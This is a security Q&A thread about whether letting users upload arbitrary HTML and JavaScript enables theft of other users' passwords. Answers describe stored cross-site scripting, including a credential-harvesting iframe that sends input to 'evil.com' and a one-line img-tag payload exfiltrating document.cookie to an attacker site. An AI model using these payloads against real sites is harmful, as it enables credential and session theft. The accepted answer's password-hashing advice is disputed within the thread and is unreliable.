# Possibility to upload any HTML and JS is a security hole, isn't it?

Tags: passwords, javascript, html

Is it true that if an attacker has the possibility to upload any `.html` and `.js` files, then he can get a password of another user?

Please explain how to do it.

Comment: Oh, I see: The attacker can get an authorization cookie. But can he also steal the password?

Comment: That assumption is heavily dependent on the situation. XSS attacks can do a lot, and stealing passwords is one of them, but only if the conditions are right.

Comment: Please add additional context.  This is a very broad question, and without having specific knowledge of the implementation there's no way to answer this well.

Answer (score 1, accepted):

Depends how you store passwords. If you store the passwords as plaintext the yes it is a trivial job for anyone with write access to a web server to obtain the plaintext password. If however you store the passwords via a one-way hash using a procedure such as sha3 it becomes more difficult for an attacker. They would have to find a string to put into the procedure such that the output is the same as the given hash. It was estimated that doing this with an earlier version of sha (sha1) would cost about USD2k on the Amazon cloud platform.

Comment: You might want to explain what method you are describing.  It seems like you're skipping straight to having access to a hash.

Comment: Paula, you don't explicitly say it, but you are talking about exfiltrating data from the password database on the server. I think the OP is asking about attacking a user's session.

Comment: I think the confusion arises from OP's post. He talks about stealing a password, not a session ID.

Comment: The original question was: "Is it true that if an attacker has the possibility to upload any .html and .js files, then he can get a password of another user?..."

Comment: And given that that was the original question I am a little puzzled as to how I get blamed for not discussing session cookies. It seems to me that the key words here are 'upload' which is usually in the direction of the server, 'password' any system which stores passwords in cookies is just asking to be cracked.

Comment: @PaulaThomas How would being able to write JS and HTML enable you to get access to any password hashes? That would normaly require access to the database. To me it seems that you are assuming that (a) the server will execute the JS server side, and (b) that the attacker has the DB password. Besides, SHA3 is not a good password hashing function. And I doubt the average password (with lazy levels of entropy) would cost 2k to crack if it is only hashed with SHA1.

Comment: @Anders, if you can upload html and js you can upload files and files can contain a lot more than html or js!

Answer (score 2):

Yes, this is a huge security hole. Lets say you discovered this on `example.com`. How do you exploit it?

1. Upload a HTML file containing an iframe with the login page of `example.com`, and some JavaScript to read any passwords entered and send them to `evil.com`.
2. Send the link to some innocent victim: "Just login to `example.com` to claim your free prize!" When the victim visit the site, she notice that everything lookas as it always does - even the EV certificate checks out. So surely everything must be allright! She enters her login credentials.
3. Profit.

Please note that this is not a case of the victim being gullible, since she is actually on the right site and not a phishing mirror like `eksample.com`. Still, if you don't want to rely on any action from the victim other than following the link, you could still easily steal session cookies (unless they are HTTP-only).

Answer (score 1):

> Is it true that if an attacker has the possibility to upload any .html and .js files, then he can get a password of another user?

If the attacked can upload those onto the server? Yes. It is trivial to read the password field with JS. Then encode the password as a URL to a domain controlled by the attacker and shove it into `window.location`.

Answer (score 1):

if he can upload any html or JavaScript file and is able to overwrite any page of the website. (by downloading, editing and re-reuploading any html file), he could run any code he wants. He would basically perform a stored [Cross-scripting attack](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

He could easily write something like

> <img src="www.evilwebsite.com/+document.cookie" />

this steals the session ID of any user who visits the page and allows the attacker to hijack the session. Allowing him to impersonate the compromised users.

He could also just edit any login form to also send the login details to the attacker's website or webservice.